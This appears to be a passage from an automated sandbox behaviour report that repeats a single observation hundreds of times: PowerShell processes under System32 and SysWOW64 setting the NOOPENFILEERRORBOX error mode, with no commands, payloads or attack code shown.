Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
